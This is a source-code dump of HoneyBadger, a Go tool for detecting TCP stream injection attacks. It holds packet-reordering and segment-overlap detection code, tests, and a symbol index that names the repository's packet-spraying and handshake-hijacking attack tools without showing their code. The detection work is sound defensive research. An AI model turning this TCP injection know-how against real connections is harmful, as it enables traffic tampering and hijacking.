quotaSizeBytes: quotaSizeBytes,
headerFunc: headerFunc,
sizes: make([]int, numLogs),
fp: nil,
mustWriteHeader: true,
}
return w
}
func (w *RotatingQuotaWriter) Write(output []byte) (int, error) {
var err error
if w.fp == nil {
w.fp, err = os.Create(w.filename)
if err != nil {
panic(err)
}
w.mustWriteHeader = true
w.headerFunc()
w.sizes[0] += len(output)
return w.fp.Write(output)
}
if w.mustWriteHeader {
w.mustWriteHeader = false
w.sizes[0] += len(output)
return w.fp.Write(output)
}
if w.sizes[0]+len(output) > w.logSize {
w.rotate()
// pop
w.sizes = w.sizes[0 : len(w.sizes)-1]
// push
new := make([]int, 1, 10)
new[0] = len(output)
w.sizes = append(new, w.sizes...)
w.fp, err = os.Create(w.filename)
if err != nil {
panic(err)
}
} else {
w.sizes[0] += len(output)
}
return w.fp.Write(output)
}
func (w *RotatingQuotaWriter) Close() error {
err := w.fp.Close()
w.fp = nil
return err
}
func (w *RotatingQuotaWriter) rotate() {
var err error
if w.fp != nil {
err = w.fp.Close()
w.fp = nil
if err != nil {
panic(err)
}
}
for i := w.numLogs; i > 0; i-- {
w.shiftLog(i)
}
newName := fmt.Sprintf("%s.1", w.filename)
err = os.Rename(w.filename, newName)
if err != nil {
panic(err)
}
}
func (w *RotatingQuotaWriter) shiftLog(logNum int) {
var err error
oldName := fmt.Sprintf("%s.%d", w.filename, logNum)
if logNum == w.numLogs {
os.Remove(oldName)
return
}
_, err = os.Stat(oldName)
if os.IsNotExist(err) {
return
} else if err != nil {
panic(err)
}
newName := fmt.Sprintf("%s.%d", w.filename, logNum+1)
err = os.Rename(oldName, newName)
if err != nil {
panic(err)
}
}
================================================
FILE: logging/util_test.go
================================================
package logging
type TestSignalWriter struct {
lastWrite []byte
signalChan chan bool
closeChan chan bool
}
func NewTestSignalWriter() *TestSignalWriter {
return &TestSignalWriter{
signalChan: make(chan bool),
closeChan: make(chan bool),
}
}
func (w *TestSignalWriter) Write(data []byte) (int, error) {
w.lastWrite = data
w.signalChan <- true
return len(data), nil
}
func (w *TestSignalWriter) Close() error {
w.closeChan <- true
return nil
}
================================================
FILE: ordered_coalesce.go
================================================
/*
* packet_reorder.go - tcp packet reordering
*
* I include google's license because this code is copy-pasted and refactored
* from the original, Google's gopacket.tcpassembly...
* Thanks to Graeme Connel for writing tcpassembly!
*/
// Copyright 2012 Google, Inc. All rights reserved.
//
// Use of this source code is governed by a BSD-style license
// that can be found in the LICENSE_BSD file in the root of the source
// tree.
package HoneyBadger
import (
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket/layers"
"log"
"time"
)
const pageBytes = 1900
const memLog = true // XXX get rid of me later...
// page is used to store TCP data we're not ready for yet (out-of-order
// packets). Unused pages are stored in and returned from a pageCache, which
// avoids memory allocation. Used pages are stored in a doubly-linked list in
// an OrderedCoalesce.
type page struct {
types.Reassembly
index int
prev, next *page
buf [pageBytes]byte
}
// pageCache is a concurrency-unsafe store of page objects we use to avoid
// memory allocation as much as we can. It grows but never shrinks.
type pageCache struct {
free []*page
pcSize int
size, used int
pages [][]page
pageRequests int64
}
const initialAllocSize = 1024
func newPageCache() *pageCache {
pc := &pageCache{
free: make([]*page, 0, initialAllocSize),
pcSize: initialAllocSize,
}
pc.grow()
return pc
}
// grow exponentially increases the size of our page cache as much as necessary.
func (c *pageCache) grow() {
pages := make([]page, c.pcSize)
c.pages = append(c.pages, pages)
c.size += c.pcSize
for i := range pages {
c.free = append(c.free, &pages[i])
}
if memLog {
log.Println("PageCache: created", c.pcSize, "new pages")
}
c.pcSize *= 2
}
// next returns a clean, ready-to-use page object.
func (c *pageCache) next(ts time.Time) (p *page) {
if memLog {
c.pageRequests++
if c.pageRequests&0xFFFF == 0 {
log.Println("PageCache:", c.pageRequests, "requested,", c.used, "used,", len(c.free), "free")
}
}
if len(c.free) == 0 {
c.grow()
}
i := len(c.free) - 1
p, c.free = c.free[i], c.free[:i]
p.prev = nil
p.next = nil
p.Seen = ts
p.Bytes = p.buf[:0]
c.used++
return p
}
// replace replaces a page into the pageCache.
func (c *pageCache) replace(p *page) {
c.used--
c.free = append(c.free, p)
}
func min(a, b int) int {
if a < b {
return a
}
return b
}
func byteSpan(expected, received types.Sequence, bytes []byte) (toSend []byte, next types.Sequence) {
if expected == types.InvalidSequence {
return bytes, received.Add(len(bytes))
}
span := int(received.Difference(expected))
if span <= 0 {
return bytes, received.Add(len(bytes))
} else if len(bytes) < span {
return nil, expected
}
return bytes[span:], expected.Add(len(bytes) - span)
}
type OrderedCoalesce struct {
// MaxBufferedPagesTotal is an upper limit on the total number of pages to
// buffer while waiting for out-of-order packets. Once this limit is
// reached, the assembler will degrade to flushing every connection it
// gets a packet for. If <= 0, this is ignored.
MaxBufferedPagesTotal int
// MaxBufferedPagesPerConnection is an upper limit on the number of pages
// buffered for a single flow. Should this limit be reached for a
// particular flow, the smallest sequence number will be flushed, along
// with any contiguous data. If <= 0, this is ignored.
MaxBufferedPagesPerFlow int
Flow *types.TcpIpFlow
StreamRing *types.Ring
log types.Logger
pageCount int
PageCache *pageCache
first, last *page
DetectCoalesceInjection bool
attackDetected *bool
}
func NewOrderedCoalesce(logger types.Logger, flow *types.TcpIpFlow, pageCache *pageCache, streamRing *types.Ring, maxBufferedPagesTotal, maxBufferedPagesPerFlow int, DetectCoalesceInjection bool, attackDetected *bool) *OrderedCoalesce {
return &OrderedCoalesce{
attackDetected: attackDetected,
log: logger,
Flow: flow,
PageCache: pageCache,
StreamRing: streamRing,
MaxBufferedPagesTotal: maxBufferedPagesTotal,
MaxBufferedPagesPerFlow: maxBufferedPagesPerFlow,
DetectCoalesceInjection: DetectCoalesceInjection,
}
}
// Close returns all used pages to the page cache
func (o *OrderedCoalesce) Close() {
for c := o.first; c != nil; c = c.next {
o.PageCache.replace(c)
}
}
func (o *OrderedCoalesce) insert(packetManifest *types.PacketManifest, nextSeq types.Sequence) (types.Sequence, bool) {
isEnd := false
if o.first != nil && o.first.Seq == nextSeq {
panic("wtf")
}
// XXX for now we ignore zero size packets
if len(packetManifest.Payload) == 0 {
return nextSeq, false
}
if o.pageCount < 0 {
panic("OrderedCoalesce.insert pageCount less than zero")
}
// XXX todo: handle out of order FIN and RST packets
p, p2, pcount := o.pagesFromTcp(packetManifest)
prev, current := o.traverse(types.Sequence(packetManifest.TCP.Seq))
o.pushBetween(prev, current, p, p2)
o.pageCount += pcount
if (o.MaxBufferedPagesPerFlow > 0 && o.pageCount >= o.MaxBufferedPagesPerFlow) ||
(o.MaxBufferedPagesTotal > 0 && o.PageCache.used >= o.MaxBufferedPagesTotal) {
if o.pageCount < 0 {
panic("OrderedCoalesce.insert pageCount less than zero")
}
nextSeq, isEnd = o.flushUntilThreshold(nextSeq)
}
return nextSeq, isEnd
}
// flushUntilThreshold will flush our cache until either we are within the threshold OR
// our cache is empty.
func (o *OrderedCoalesce) flushUntilThreshold(nextSeq types.Sequence) (types.Sequence, bool) {
isEnd := false
for o.first != nil && o.pageCount >= o.MaxBufferedPagesPerFlow || o.PageCache.used >= o.MaxBufferedPagesTotal {
nextSeq, isEnd = o.addNext(nextSeq)
if isEnd {
break
}
}
if o.first != nil {
nextSeq, isEnd = o.addContiguous(nextSeq)
}
return nextSeq, isEnd
}
// pagesFromTcp creates a page (or set of pages) from a TCP packet. Note that
// it should NEVER receive a SYN packet, as it doesn't handle sequences
// correctly.
//
// It returns the first and last page in its doubly-linked list of new pages.
func (o *OrderedCoalesce) pagesFromTcp(p *types.PacketManifest) (*page, *page, int) {
first := o.PageCache.next(p.Timestamp)
count := 1
current := first
seq, bytes := types.Sequence(p.TCP.Seq), p.Payload
for {
length := min(len(bytes), pageBytes)
current.Bytes = current.buf[:length]
copy(current.Bytes, bytes)
current.Seq = seq
bytes = bytes[length:]
if len(bytes) == 0 {
break
}
seq = seq.Add(length)
current.next = o.PageCache.next(p.Timestamp)
count++
current.next.prev = current
current = current.next
}
current.End = p.TCP.RST || p.TCP.FIN
return first, current, count
}
// traverse traverses our doubly-linked list of pages for the correct
// position to put the given sequence number. Note that it traverses backwards,
// starting at the highest sequence number and going down, since we assume the
// common case is that TCP packets for a stream will appear in-order, with
// minimal loss or packet reordering.
func (o *OrderedCoalesce) traverse(seq types.Sequence) (*page, *page) {
var prev, current *page
prev = o.last
for prev != nil && prev.Seq.Difference(seq) < 0 {
current = prev
prev = current.prev
}
return prev, current
}
// pushBetween inserts the doubly-linked list first-...-last in between the
// nodes prev-next in another doubly-linked list. If prev is nil, makes first
// the new first page in the connection's list. If next is nil, makes last the
// new last page in the list. first/last may point to the same page.
func (o *OrderedCoalesce) pushBetween(prev, next, first, last *page) {
// Maintain our doubly linked list
if next == nil || o.last == nil {
o.last = last
} else {
last.next = next
next.prev = last
}
if prev == nil || o.first == nil {
o.first = first
} else {
first.prev = prev
prev.next = first
}
}
func (o *OrderedCoalesce) freeNext() {
if o.first == nil {
panic("o.first is nil")
}
reclaim := o.first
if o.first == o.last {
o.first = nil
o.last = nil
} else {
o.first = o.first.next
o.first.prev = nil
}
o.PageCache.replace(reclaim)
o.pageCount--
if o.pageCount < 0 {
// XXX wtf srsly
panic("pageCount less than zero")
}
}
// addNext pops the first page off our doubly-linked-list and
// appends it to the reassembly-ring.
// Here we also handle the case where the connection should be closed
// by returning the bool value set to true.
func (o *OrderedCoalesce) addNext(nextSeq types.Sequence) (types.Sequence, bool) {
if o.first == nil {
panic("o.first is nil")
}
diff := nextSeq.Difference(o.first.Seq)
if nextSeq == types.InvalidSequence {
o.first.Skip = -1
} else if diff > 0 {
o.first.Skip = int(diff)
}
if o.first.End {
o.freeNext()
return -1, true // after closing the connection our Sequence return value doesn't matter
}
if len(o.first.Bytes) == 0 {
o.freeNext()
return nextSeq, false
}
// ensure we do not add segments that end before nextSeq
diff = o.first.Seq.Add(len(o.first.Bytes)).Difference(nextSeq)
if diff > 0 {
o.freeNext()
return nextSeq, false
}
if o.DetectCoalesceInjection && len(o.first.Bytes) > 0 {
// XXX stream segment overlap condition
if diff < 0 {
p := types.PacketManifest{
Timestamp: o.first.Seen,
Payload: o.first.Bytes,
TCP: &layers.TCP{
Seq: uint32(o.first.Seq),
},
}
start := types.Sequence(p.TCP.Seq)
end := types.Sequence(p.TCP.Seq).Add(len(p.Payload))
events := checkForInjectionInRing(o.StreamRing, start, end, p.Payload)
// log events if any
for i := 0; i < len(events); i++ {
if events[i] == nil {
panic("wtf got nil event")
} else {
*o.attackDetected = true
events[i].Type = "ordered coalesce 1"
events[i].Time = o.first.Seen
events[i].Base = o.first.Seq
events[i].Flow = *o.Flow
log.Print("detected an ordered coalesce injection\n")
o.log.Log(events[i])
}
}
}
}
bytes, seq := byteSpan(nextSeq, o.first.Seq, o.first.Bytes) // XXX injection happens here
if bytes != nil {
o.first.Bytes = bytes
nextSeq = seq
// append reassembly to the reassembly ring buffer
if len(o.first.Bytes) > 0 {
o.StreamRing.Reassembly = &o.first.Reassembly
o.StreamRing.Reassembly.IsCoalesce = true
o.StreamRing = o.StreamRing.Next()
}
}
o.freeNext()
return nextSeq, false
}
// addContiguous adds contiguous byte-sets to a connection.
// returns the next Sequence number and a bool value set to
// true if the end of connection was detected.
func (o *OrderedCoalesce) addContiguous(nextSeq types.Sequence) (types.Sequence, bool) {
var isEnd bool
for o.first != nil && nextSeq.Difference(o.first.Seq) <= 0 {
nextSeq, isEnd = o.addNext(nextSeq)
if isEnd {
return nextSeq, true
}
}
return nextSeq, false
}
================================================
FILE: ordered_coalesce_test.go
================================================
package HoneyBadger
import (
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
"net"
"testing"
"time"
)
func TestOrderedCoalesceUsedPages(t *testing.T) {
maxBufferedPagesTotal := 1024
maxBufferedPagesPerFlow := 1024
streamRing := types.NewRing(40)
PageCache := newPageCache()
ipFlow, _ := gopacket.FlowFromEndpoints(layers.NewIPEndpoint(net.IPv4(1, 2, 3, 4)), layers.NewIPEndpoint(net.IPv4(2, 3, 4, 5)))
tcpFlow, _ := gopacket.FlowFromEndpoints(layers.NewTCPPortEndpoint(layers.TCPPort(1)), layers.NewTCPPortEndpoint(layers.TCPPort(2)))
flow := types.NewTcpIpFlowFromFlows(ipFlow, tcpFlow)
var nextSeq types.Sequence = types.Sequence(1)
attackDetected := false
coalesce := NewOrderedCoalesce(nil, &flow, PageCache, streamRing, maxBufferedPagesTotal, maxBufferedPagesPerFlow, false, &attackDetected)
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
Seq: 3,
SYN: false,
SrcPort: 1,
DstPort: 2,
}
p := types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
coalesce.insert(&p, nextSeq)
if coalesce.PageCache.used != 1 {
t.Errorf("coalesce.pager.Used() not equal to 1\n")
t.Fail()
}
coalesce.Close()
}
================================================
FILE: pcap_integration_test.go
================================================
package HoneyBadger
import (
"fmt"
"io"
"os"
"path/filepath"
"strings"
"testing"
"time"
"github.com/david415/HoneyBadger/types"
)
type DummyPacketLogger struct {
}
func NewDummyPacketLogger(str string, flow *types.TcpIpFlow, pcapNum int, pcapSize int) types.PacketLogger {
m := DummyPacketLogger{}
return types.PacketLogger(&m)
}
type DummyPacketLoggerFactory struct {
}
func (f DummyPacketLoggerFactory) Build(flow *types.TcpIpFlow) types.PacketLogger {
return NewDummyPacketLogger("", flow, 10, 100)
}
func (m *DummyPacketLogger) WritePacket(rawPacket []byte, timestamp time.Time) {
}
func (m DummyPacketLogger) SetFileWriter(writer io.WriteCloser) {
}
func (m DummyPacketLogger) Start() {
}
func (m DummyPacketLogger) Stop() {
}
func (m DummyPacketLogger) Archive() {
}
func (m DummyPacketLogger) Remove() {
}
type TestLogger struct {
eventList []types.Event
count int
}
func NewTestLogger() TestLogger {
return TestLogger{}
}
func (t *TestLogger) Log(event *types.Event) {
t.count += 1
}
func (t *TestLogger) Archive() {
}
func SetupAttackDetectionPcapInquisitor(pcapPath string, attackLogger *TestLogger) {
tcpIdleTimeout, _ := time.ParseDuration("10m")
dispatcherOptions := DispatcherOptions{
BufferedPerConnection: 10,
BufferedTotal: 100,
LogDir: "",
LogPackets: true,
TcpIdleTimeout: tcpIdleTimeout,
MaxRingPackets: 40,
Logger: types.Logger(attackLogger),
DetectHijack: true,
DetectInjection: true,
DetectCoalesceInjection: true,
MaxConcurrentConnections: 100,
}
wireDuration, _ := time.ParseDuration("3s")
snifferOptions := types.SnifferDriverOptions{
DAQ: "libpcap",
Device: "",
Filename: pcapPath,
WireDuration: wireDuration,
Snaplen: 65536,
Filter: "tcp",
}
factory := &DefaultConnFactory{}
dummyPacketLoggerFactory := DummyPacketLoggerFactory{}
options := SupervisorOptions{
SnifferDriverOptions: &snifferOptions,
DispatcherOptions: dispatcherOptions,
SnifferFactory: NewSniffer,
ConnectionFactory: factory,
PacketLoggerFactory: dummyPacketLoggerFactory,
}
supervisor := NewSupervisor(options)
supervisor.Run()
return
}
func PcapIsDetectInjection(pcapPath string) bool {
logger := NewTestLogger()
SetupAttackDetectionPcapInquisitor(pcapPath, &logger)
if logger.count == 0 {
return false
} else {
return true
}
}
func TestAllPcapFiles(t *testing.T) {
root := "pcap_archive/"
absPathSymLink, err := filepath.Abs(root)
if err != nil {
panic(err)
}
var path string
path, err = filepath.EvalSymlinks(absPathSymLink)
if err != nil {
t.Skip("skipping test because pcap_archive symlink is missing.")
}
walkpath := func(path string, f os.FileInfo, err error) error {
if strings.HasSuffix(path, ".pcap") {
fmt.Printf("HoneyBadger integration test with: %s\n", path)
if !PcapIsDetectInjection(path) {
t.Fatalf("No injection attack detected in pcap file: %s\n", path)
}
}
return nil
}
err = filepath.Walk(path, walkpath)
if err != nil {
panic(err)
}
}
================================================
FILE: retrospective.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package HoneyBadger
import (
"github.com/david415/HoneyBadger/types"
"github.com/david415/HoneyBadger/blocks"
"log"
"bytes"
"encoding/hex"
)
func checkForInjectionInRing(ringPtr *types.Ring, start, end types.Sequence, payload []byte) []*types.Event {
acc := []*types.Event{}
overlapBlockSegments := getOverlapsInRing(ringPtr, start, end)
for i := 0; i < len(overlapBlockSegments); i++ {
packetOverlapBytes := getOverlapBytesFromSlice(payload, start, overlapBlockSegments[i].Block)
if !bytes.Equal(packetOverlapBytes, overlapBlockSegments[i].Bytes) {
log.Printf("injection at TCP Sequence start %d end %d\n", start, end)
log.Print("race winner stream segment:")
log.Print(hex.Dump(overlapBlockSegments[i].Bytes))
log.Print("race loser stream segment:")
log.Print(hex.Dump(packetOverlapBytes))
e := &types.Event{
Loser: packetOverlapBytes,
Winner: overlapBlockSegments[i].Bytes,
Start: overlapBlockSegments[i].Block.A,
End: overlapBlockSegments[i].Block.B,
}
if overlapBlockSegments[i].IsCoalesce {
e.Type = "ordered coalesce 2"
}
if overlapBlockSegments[i].IsCoalesceGap {
e.Type = "ordered coalesce 2 gap"
}
acc = append(acc, e)
}
}
return acc
}
func getOverlapBytesFromSlice(payload []byte, sequence types.Sequence, overlap blocks.Block) []byte {
start := sequence.Difference(overlap.A)
end := types.Sequence(start).Add(overlap.A.Difference(overlap.B))
return payload[start:end]
}
func getOverlapsInRing(ringPtr *types.Ring, start, end types.Sequence) []blocks.BlockSegment {
acc := []blocks.BlockSegment{}
target := blocks.Block {
A: start,
B: end,
}
// iterate for the entire ring
for current := ringPtr.Next(); current != ringPtr; current = current.Next() {
if current.Reassembly == nil {
continue
}
if len(current.Reassembly.Bytes) == 0 {
continue
}
new_start := types.Sequence(current.Reassembly.Seq)
new_end := types.Sequence(current.Reassembly.Seq).Add(len(current.Reassembly.Bytes))
overlap := target.Overlap(new_start, new_end)
if overlap == nil {
continue
} else {
// overlaps
overlapBytes := getOverlapBytesFromSlice(current.Reassembly.Bytes, current.Reassembly.Seq, *overlap)
blockSegment := blocks.BlockSegment {
Block: *overlap,
Bytes: overlapBytes,
IsCoalesce: current.Reassembly.IsCoalesce,
IsCoalesceGap: current.Reassembly.IsCoalesceGap,
}
acc = append(acc, blockSegment)
}
}
return acc
}
================================================
FILE: retrospective_test.go
================================================
package HoneyBadger
import (
"log"
"net"
"testing"
"github.com/david415/HoneyBadger/blocks"
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
)
type reassemblyInput struct {
Seq uint32
Payload []byte
}
type TestOverlapBytesWant struct {
bytes []byte
startOffset int
endOffset int
}
type DummyAttackLogger struct {
Count int
}
func NewDummyAttackLogger() *DummyAttackLogger {
a := DummyAttackLogger{
Count: 0,
}
return &a
}
func (d *DummyAttackLogger) Log(event *types.Event) {
d.Count += 1
}
func (d *DummyAttackLogger) Archive() {
}
func TestGetOverlapsInRing(t *testing.T) {
overlapBlockTests := []struct {
in blocks.Block
want []blocks.BlockSegment
}{
{ //0
blocks.Block{A: 1, B: 22}, []blocks.BlockSegment{
blocks.BlockSegment{blocks.Block{5, 10}, []byte{1, 2, 3, 4, 5}, false, false},
blocks.BlockSegment{blocks.Block{10, 15}, []byte{1, 2, 3, 4, 5}, false, false},
blocks.BlockSegment{blocks.Block{15, 20}, []byte{1, 2, 3, 4, 5}, false, false},
blocks.BlockSegment{blocks.Block{20, 22}, []byte{1, 2, 3}, false, false},
},
},
{ //1
blocks.Block{3, 10}, []blocks.BlockSegment{
blocks.BlockSegment{blocks.Block{5, 10}, []byte{1, 2, 3, 4, 5}, false, false},
},
},
{ //2
blocks.Block{6, 12}, []blocks.BlockSegment{
blocks.BlockSegment{blocks.Block{6, 10}, []byte{2, 3, 4, 5}, false, false},
blocks.BlockSegment{blocks.Block{10, 12}, []byte{1, 2, 3}, false, false},
},
},
{ //3
blocks.Block{A: 1, B: 17}, []blocks.BlockSegment{
blocks.BlockSegment{blocks.Block{5, 10}, []byte{1, 2, 3, 4, 5}, false, false},
blocks.BlockSegment{blocks.Block{10, 15}, []byte{1, 2, 3, 4, 5}, false, false},
blocks.BlockSegment{blocks.Block{15, 17}, []byte{1, 2, 3}, false, false},
},
gitextract_ovn09ehc/
├── .travis.yml
├── LICENSE
├── LICENSE_BSD
├── README.rst
├── attack/
│ └── injector.go
├── blocks/
│ ├── LICENSE
│ ├── blocks.go
│ └── blocks_test.go
├── cmd/
│ ├── handshakeHijacker/
│ │ └── main.go
│ ├── honeyBadger/
│ │ └── main.go
│ ├── honeybadgerReportTool/
│ │ ├── main.go
│ │ └── tcp_port_distribution.py
│ ├── honeybadgerReportToolColor/
│ │ └── main.go
│ ├── sprayInjector/
│ │ └── main.go
│ └── testBpfSniffer/
│ └── README
├── connection.go
├── connection_test.go
├── dispatcher.go
├── dispatcher_test.go
├── drivers/
│ ├── afpacket.go
│ ├── bpf.go
│ ├── libpcap.go
│ ├── pcapgo.go
│ └── register.go
├── go.mod
├── go.sum
├── logging/
│ ├── attack_logger.go
│ ├── metadata_attack_logger.go
│ ├── pcap_logger.go
│ ├── pcap_logger_test.go
│ ├── rotating_writer.go
│ └── util_test.go
├── ordered_coalesce.go
├── ordered_coalesce_test.go
├── pcap_integration_test.go
├── retrospective.go
├── retrospective_test.go
├── sniffer.go
├── supervisor.go
└── types/
├── events.go
├── flow.go
├── flow_test.go
├── packet_source.go
├── reassembly.go
├── ring.go
└── sequence.go
SYMBOL INDEX (316 symbols across 38 files)
FILE: attack/injector.go
type TCPStreamInjector (line 30) | type TCPStreamInjector struct
method SetEthernetLayer (line 51) | func (i *TCPStreamInjector) SetEthernetLayer(eth *layers.Ethernet) {
method SetIPv4Layer (line 55) | func (i *TCPStreamInjector) SetIPv4Layer(iplayer layers.IPv4) {
method SetIPv6Layer (line 59) | func (i *TCPStreamInjector) SetIPv6Layer(iplayer layers.IPv6) {
method SetTCPLayer (line 63) | func (i *TCPStreamInjector) SetTCPLayer(tcpLayer layers.TCP) {
method SpraySequenceRangePackets (line 67) | func (i *TCPStreamInjector) SpraySequenceRangePackets(start uint32, co...
method SprayFutureAndFillGapPackets (line 87) | func (i *TCPStreamInjector) SprayFutureAndFillGapPackets(start uint32,...
method Write (line 121) | func (i *TCPStreamInjector) Write() error {
function NewTCPStreamInjector (line 43) | func NewTCPStreamInjector(pcapHandle *pcap.Handle, isIPv6Mode bool) *TCP...
FILE: blocks/blocks.go
type Block (line 14) | type Block struct
method String (line 29) | func (t Block) String() string {
method Overlap (line 33) | func (blk Block) Overlap(a, b types.Sequence) *Block {
type BlockSegment (line 18) | type BlockSegment struct
method String (line 25) | func (t BlockSegment) String() string {
type Blocks (line 48) | type Blocks
method String (line 50) | func (t Blocks) String() string {
method Len (line 58) | func (blks Blocks) Len() int {
method Less (line 62) | func (blks Blocks) Less(i, j int) bool {
method Swap (line 66) | func (blks Blocks) Swap(i, j int) {
method Overlaps (line 70) | func (blks Blocks) Overlaps(a, b types.Sequence) Blocks {
method Add (line 80) | func (blks Blocks) Add(a, b types.Sequence) Blocks {
FILE: blocks/blocks_test.go
function checkBlocks (line 7) | func checkBlocks(t *testing.T, got, want Blocks) {
function TestAdd (line 21) | func TestAdd(t *testing.T) {
function TestOverlaps (line 43) | func TestOverlaps(t *testing.T) {
FILE: cmd/handshakeHijacker/main.go
function main (line 41) | func main() {
FILE: cmd/honeyBadger/main.go
function main (line 32) | func main() {
FILE: cmd/honeybadgerReportTool/main.go
function lineDiff (line 35) | func lineDiff(a, b string) {
function expandReport (line 59) | func expandReport(reportPath string) {
function main (line 99) | func main() {
FILE: cmd/honeybadgerReportTool/tcp_port_distribution.py
function count_distribution (line 8) | def count_distribution(filename, or_addr):
function main (line 32) | def main():
FILE: cmd/honeybadgerReportToolColor/main.go
function colorLineDiff (line 36) | func colorLineDiff(a, b string) {
function expandReport (line 60) | func expandReport(reportPath string) {
function main (line 100) | func main() {
FILE: cmd/sprayInjector/main.go
function main (line 44) | func main() {
FILE: connection.go
constant FIRST_FEW_PACKETS (line 34) | FIRST_FEW_PACKETS = 12
constant TCP_UNKNOWN (line 37) | TCP_UNKNOWN = 0
constant TCP_CONNECTION_REQUEST (line 38) | TCP_CONNECTION_REQUEST = 1
constant TCP_CONNECTION_ESTABLISHED (line 39) | TCP_CONNECTION_ESTABLISHED = 2
constant TCP_DATA_TRANSFER (line 40) | TCP_DATA_TRANSFER = 3
constant TCP_CONNECTION_CLOSING (line 41) | TCP_CONNECTION_CLOSING = 4
constant TCP_INVALID (line 42) | TCP_INVALID = 5
constant TCP_CLOSED (line 43) | TCP_CLOSED = 6
constant TCP_FIN_WAIT1 (line 46) | TCP_FIN_WAIT1 = 0
constant TCP_FIN_WAIT2 (line 47) | TCP_FIN_WAIT2 = 1
constant TCP_TIME_WAIT (line 48) | TCP_TIME_WAIT = 2
constant TCP_CLOSING (line 49) | TCP_CLOSING = 3
constant TCP_CLOSE_WAIT (line 52) | TCP_CLOSE_WAIT = 0
constant TCP_LAST_ACK (line 53) | TCP_LAST_ACK = 1
type ConnectionFactory (line 56) | type ConnectionFactory interface
type DefaultConnFactory (line 60) | type DefaultConnFactory struct
method Build (line 63) | func (f *DefaultConnFactory) Build(options ConnectionOptions) Connecti...
type ConnectionInterface (line 84) | type ConnectionInterface interface
type PacketDispatcher (line 92) | type PacketDispatcher interface
type ConnectionOptions (line 99) | type ConnectionOptions struct
type Connection (line 115) | type Connection struct
method GetClientFlow (line 142) | func (c *Connection) GetClientFlow() *types.TcpIpFlow {
method SetPacketLogger (line 146) | func (c *Connection) SetPacketLogger(logger types.PacketLogger) {
method GetLastSeen (line 151) | func (c *Connection) GetLastSeen() time.Time {
method updateLastSeen (line 158) | func (c *Connection) updateLastSeen(timestamp time.Time) {
method Close (line 167) | func (c *Connection) Close() {
method detectHijack (line 190) | func (c *Connection) detectHijack(p *types.PacketManifest, flow *types...
method detectInjection (line 214) | func (c *Connection) detectInjection(p *types.PacketManifest) {
method stateUnknown (line 257) | func (c *Connection) stateUnknown(p *types.PacketManifest) {
method stateConnectionRequest (line 300) | func (c *Connection) stateConnectionRequest(p *types.PacketManifest) {
method stateConnectionEstablished (line 321) | func (c *Connection) stateConnectionEstablished(p *types.PacketManifes...
method stateDataTransfer (line 352) | func (c *Connection) stateDataTransfer(p *types.PacketManifest) {
method stateFinWait1 (line 447) | func (c *Connection) stateFinWait1(p *types.PacketManifest, flow *type...
method stateFinWait2 (line 500) | func (c *Connection) stateFinWait2(p *types.PacketManifest, flow *type...
method stateCloseWait (line 517) | func (c *Connection) stateCloseWait(p *types.PacketManifest) {
method stateTimeWait (line 534) | func (c *Connection) stateTimeWait(p *types.PacketManifest) {
method stateClosing (line 541) | func (c *Connection) stateClosing(p *types.PacketManifest) {
method stateLastAck (line 546) | func (c *Connection) stateLastAck(p *types.PacketManifest, flow *types...
method detectCensorInjection (line 562) | func (c *Connection) detectCensorInjection(p *types.PacketManifest) {
method stateClosed (line 598) | func (c *Connection) stateClosed(p *types.PacketManifest) {
method stateConnectionClosing (line 611) | func (c *Connection) stateConnectionClosing(p *types.PacketManifest) {
method ReceivePacket (line 651) | func (c *Connection) ReceivePacket(p *types.PacketManifest) {
FILE: connection_test.go
function TestStateDataTransfer (line 14) | func TestStateDataTransfer(t *testing.T) {
function TestTCPConnect (line 123) | func TestTCPConnect(t *testing.T) {
function TestClientThreeWayClose (line 233) | func TestClientThreeWayClose(t *testing.T) {
function TestServerThreeWayClose (line 237) | func TestServerThreeWayClose(t *testing.T) {
function HelperTestThreeWayClose (line 241) | func HelperTestThreeWayClose(isClient bool, t *testing.T) {
function TestTCPHijack (line 385) | func TestTCPHijack(t *testing.T) {
FILE: dispatcher.go
type TimedRawPacket (line 31) | type TimedRawPacket struct
type DispatcherOptions (line 39) | type DispatcherOptions struct
type Dispatcher (line 57) | type Dispatcher struct
method GetObservedConnectionsChan (line 88) | func (i *Dispatcher) GetObservedConnectionsChan(count int) chan bool {
method Start (line 94) | func (i *Dispatcher) Start() {
method Stop (line 99) | func (i *Dispatcher) Stop() {
method Connections (line 106) | func (i *Dispatcher) Connections() []ConnectionInterface {
method connections (line 110) | func (i *Dispatcher) connections() []ConnectionInterface {
method ReceivePacket (line 121) | func (i *Dispatcher) ReceivePacket(p *types.PacketManifest) {
method CloseOlderThan (line 127) | func (i *Dispatcher) CloseOlderThan(t time.Time) int {
method CloseAllConnections (line 144) | func (i *Dispatcher) CloseAllConnections() int {
method closeConnectionList (line 152) | func (i *Dispatcher) closeConnectionList(conns []ConnectionInterface) ...
method setupNewConnection (line 172) | func (i *Dispatcher) setupNewConnection(flow *types.TcpIpFlow) Connect...
method dispatchPackets (line 209) | func (i *Dispatcher) dispatchPackets() {
function NewDispatcher (line 72) | func NewDispatcher(options DispatcherOptions, connectionFactory Connecti...
FILE: dispatcher_test.go
type MockSniffer (line 16) | type MockSniffer struct
method Start (line 28) | func (s *MockSniffer) Start() {
method Stop (line 32) | func (s *MockSniffer) Stop() {
method SetSupervisor (line 35) | func (s *MockSniffer) SetSupervisor(supervisor types.Supervisor) {
method GetStartedChan (line 38) | func (s *MockSniffer) GetStartedChan() chan bool {
